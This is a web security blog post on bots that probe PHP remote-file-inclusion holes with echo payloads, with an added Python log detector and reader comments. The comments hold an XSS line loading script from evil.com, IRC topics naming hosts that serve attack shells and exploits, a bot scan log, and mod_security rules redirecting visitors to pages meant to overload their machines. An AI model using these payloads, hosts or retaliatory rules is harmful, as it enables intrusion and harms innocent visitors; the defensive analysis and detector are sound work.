web application security lab

PHP Include Robots

I’ve been toying around quite a bit with robots that attempt to exploit this site in various ways. I’ve been seeing an interesting shift: the robots are moving away from direct exploitation and instead first check that the site is actually exploitable. That is interesting because it reduces the risk (for the bot herder) of someone just connecting to the script, downloading it and connecting to the controlling IRC servers. Here’s the list I got in today’s log file (please use extreme caution when viewing these - they are intentionally hostile in unknown ways):


You’ll notice an awful lot of “echo” versions which (when still valid) return content like:

<? echo "1122548"; ?>

Apparently others have seen this as well, so it’s not just me. This is a shift in tactics that will no doubt have a big impact on the survivability of bot-nets, as they will be more difficult to detect. The only problem (from the bot herder’s point of view) is that the numbers don’t appear to be dynamic, so a static echo response can be faked without ever including the remote file. It won’t take long to correct that, which will mean that seeing what the bots are doing will require honeypots. It’ll be interesting to see the bots evolve over time.
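As an added example for this post (not RSnake’s code), the following Python script flags the probe pattern described above in Apache combined-format access logs: a query parameter whose value is a remote URL ending in “?”, the %00 null-byte suffix that shows up in some of the attempts, and the libwww-perl/Java user-agents mentioned in the comments. The log lines and hostnames in it are constructed.

```python
"""Flag remote-file-inclusion (RFI) probes in Apache combined-format access logs.

Added example for this page, not code from the original post. It looks for the
request shape the post describes: a query parameter whose value is itself a URL
ending in '?' (so anything the script appends becomes a harmless query string),
the '%00' null-byte suffix seen in some of the attempts, and the scanner
user-agents (libwww-perl, Java) named in the comments. Every log line and
hostname below is constructed for illustration.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log (Apache combined format). Lines 1, 2 and 4 are probes;
# line 3 is an ordinary page view and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2007:10:01:22 +0000] "GET /index.php?page=http://example.net/echo.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.5 - - [12/Mar/2007:10:01:23 +0000] "GET /index2.php?inhalt=http://example.net/c9.txt?=%00 HTTP/1.1" 200 1874 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.9 - - [12/Mar/2007:10:02:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048 "http://www.example.org/" "Mozilla/5.0 (X11; Linux)"
198.51.100.9 - - [12/Mar/2007:10:02:05 +0000] "GET /go.php?url=http%3A%2F%2Fexample.net%2Fsource.txt%3F&&s=r& HTTP/1.1" 200 77 "-" "Java/1.5.0_10"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_URL = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# '?' at the end of the injected URL, optionally followed by '=' and a NUL byte.
TRAILING_QMARK = re.compile(r'\?=?\x00?$')
SCANNER_UA = re.compile(r'^(libwww-perl|Java)/', re.IGNORECASE)


def parse_line(line):
    """Split one combined-format log line into fields; None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def rfi_indicators(target):
    """Return the RFI indicators found in a request target (path plus query string)."""
    reasons = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes the values, so '%00' becomes a real NUL byte here
    # and '%3A%2F%2F' becomes '://'. Blank values are kept so 'x=' still shows up.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not REMOTE_URL.match(value):
            continue
        reasons.append(f"param {name!r} points at a remote URL")
        if TRAILING_QMARK.search(value):
            reasons.append("remote URL ends in '?' (neutralises anything the script appends)")
        if '\x00' in value:
            reasons.append("null byte after the URL (truncates an appended extension)")
    return reasons


def analyze_log(text):
    """One finding per suspicious request: dict with ip, target, ua and reasons."""
    findings = []
    for line in text.splitlines():
        fields = parse_line(line)
        if fields is None:
            continue
        reasons = rfi_indicators(fields['target'])
        # A scanner user-agent on its own is weaker evidence (some legitimate
        # tools use it too), so record it as a reason rather than a verdict.
        if SCANNER_UA.match(fields['ua']):
            reasons.append(f"scanner user-agent {fields['ua']!r}")
        if reasons:
            findings.append({'ip': fields['ip'], 'target': fields['target'],
                             'ua': fields['ua'], 'reasons': reasons})
    return findings


def probe_sources(findings):
    """Sorted client IPs that sent at least one request with an RFI indicator
    (not just a scanner user-agent); a starting point for a block list."""
    ips = {f['ip'] for f in findings
           if any(r.startswith('param ') for r in f['reasons'])}
    return sorted(ips)


if __name__ == '__main__':
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['target']}")
        for r in f['reasons']:
            print(f"    - {r}")
    print("block candidates:", probe_sources(analyze_log(SAMPLE_LOG)))
```

Feed it a real access log with `analyze_log(open(path).read())`; the indicators are deliberately narrow, so a hit on the remote-URL rule is worth a look even when the user-agent is a normal browser string.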

16 Responses to “PHP Include Robots”

  1. Awesome AnDrEw Says:

    I find a couple hundred attempts to load c99 PHP shells each and every day rifling through my domain logs. Usually they are in the form of a text file, or image, but in some cases the file does not even exist. It’s still a pain in the ass though.

  2. kuza55 Says:

    Here’s an interesting proposal:

    If the bots submit a file which looks like this:

    <? echo "<script src='http://evil.com/xss.js'></script>"; ?>

    What do you do?

    If you echo the content back, then you’ve just created yourself an XSS hole, but if you don’t echo it back, then you can’t find what the bot is doing.

    And there is no way to emulate that kind of response without giving it, so unlike a payload which checks databases or reads files, you have to let it do some damage.

  3. sil Says:

    I see these in my log constantly. What I’ve been noticing more of are bots that are using HTTP REFERRERS from my own site. E.g. this was a pesky little thing for a minute until I blocked it with mod_security and a chain. An easy way with mod_security is something like this, which I’ve tested and currently implemented in the last 36 hours…

    # Anyone coming in... Check them
    SecFilterSelective REQUEST_URI "/index.php" chain

    # If they're injecting any http string redirect them...
    SecFilterSelective REQUEST_URI ".*http://*" redirect:http://www.infiltrated.net/sorry.jpg

    # Anyone circumventing garbage... redirect them too but send their PC into memory overload
    SecFilterSelective REQUEST_URI ".*amp;do" redirect:http://www.infiltrated.net/stupidIE.html

    # Anyone visiting this site... I didn't refer you... If you want to pretend like I did... You too can get das boot and have your machine overloaded...
    SecFilterSelective REQUEST_URI ".*item=35" chain
    SecFilterSelective HTTP_REFERER "http://www.infiltrated.net/index.php?id=news&do=2&item=35" redirect:http://www.infiltrated.net/stupidIE.html

    Now I noticed after these rules were in place, there were a few hosts trying to shift things around so I played with them until I got bored and created the mod_security+htaccess+personal_script to auto ipf em from connecting for a week…

    Sup zeno and rs (if you read this) … sil

  4. jody Says:

    ugh, check out irc.gigachat.net:6667 - referenced in a few of these php bots.

    it’s NOTHING BUT .br ddos kiddies…

    most popular channel is #DDOS :

    * Topic is '#DDOs Amigos, SCAN's Tudo aqui =] Quer Registros? Conquiste! CMD -> http://vnc2007.netfast.org/tr57.txt? / Mudanas estao para acontecer e novidades tambm..! http://www.milw0rm.com/author/53'

    * Now talking in #aod
    * Topic is 'Angels of Death team: Neogenik - bapoz - mephisto - Darkrevenge | Xpl1: http://www.injek.cc/xpl/ | Xpl2: http://www.adek.org/xpl/ |cmd: http://andravarldar.se/cmd? | BotScan: http://AoD.tiagow.us/botscan.txt |News: DarkRevenge coding CMD for Sony PSP'

    * Now talking in #wWw.cOm
    * Topic is 'CMD = http://cmdfile.ifastnet.com/cmd/a.txt? | XPL = http://www.adek.org/xpl/ - (@Scan)(Online) - Type - !scan | Don't flood bot ! '

    and so on, and so on….

    *sigh*

  5. jody Says:

    Addendum:

    From a channel topic: http://www.xshqiptaretx.org/SHELLZ.txt

  6. jody Says:

    http://www.xshqiptaretx.org/x0rLzalboZ/stringvuln.txt
    STRINGS THERE
    :)
    :)
    !scan /surveys/survey.inc.php?path= inurl:surveys
    !scan index.php?body= inurl:”index.php?body=”
    (@Started)[Scanning] Dork: inurl:surveys
    (@Searching Altavista:0 Sites)
    (@Searching GOOGLE:168 Sites)
    (@Searching Yahoo:0 Sites)
    (@Scan)(Total:1111 Sites)
    (@Scan)(websearch:24 Sites)
    (@Searching Altavista:301 Sites)
    (@Searching GOOGLE:307 Sites)
    (@Searching Yahoo:0 Sites)
    (@Scan)(Total:1929 Sites)
    (@Scan)(websearch:530 Sites)

  7. Ronald Says:

    Those are easy to detect. I logged them also, they all use:

    - libwwwperl *.*
    - Java user-agent.

    99% of them are blocked upon entry on my site. I like clean logs.

  8. bunkacid Says:

    I still get the daily requests, and after reading this thread, I’m going to try sil’s mod_security idea.

    Thanks for the trackback.

  9. Dennis Day Says:

    I have noticed that we have been getting a lot of these scripts relaying through my server and was wondering if you knew where I could redirect these bastards.

  10. RSnake Says:

    I dunno, I’m up for suggestions. We could create a collection of them, to start blackhole-ing them. Something you could quickly upload to openDNS or your firewall.

  11. David Ulevitch Says:

    RSnake,

    We’re down to figure out a nice way of making this safe and effective. In fact, I would mind running some ideas that we’re tossing about with you. Dealing with dynamic IPs is problematic sometimes and it becomes more of an issue as we provide more security-related services.

    -davidu

  12. RSnake Says:

    Yah, David, drop me an email or something.

  13. Dennis Day Says:

    I have come up with a similar script that seems to deter these scripts

    setTimeout("trapDiv = new Div(); trapDiv.id = 'div'+id; trapDiv.height = parseInt(id / 1000); trapDiv.innerHTML='while (z.length '; ", 2000);

  14. Lord Says:

    can u give me this kind of bots
    (@Started)[Scanning] Dork: inurl:surveys
    (@Searching Altavista:0 Sites)
    (@Searching GOOGLE:168 Sites)
    (@Searching Yahoo:0 Sites)
    ??

  15. edache Says:

    man i am in love with this forum is there anybody that can teach me on how to hack a c99 shell or how to get mine thx very much

  16. Websecurity - Веб безпека Says:

    PHP Include attacks

    There is a class of vulnerabilities known as PHP Include. In this case we are talking about Remote PHP Include (Remote File Inclusion, RFI). Accordingly, RFI attacks are carried out using…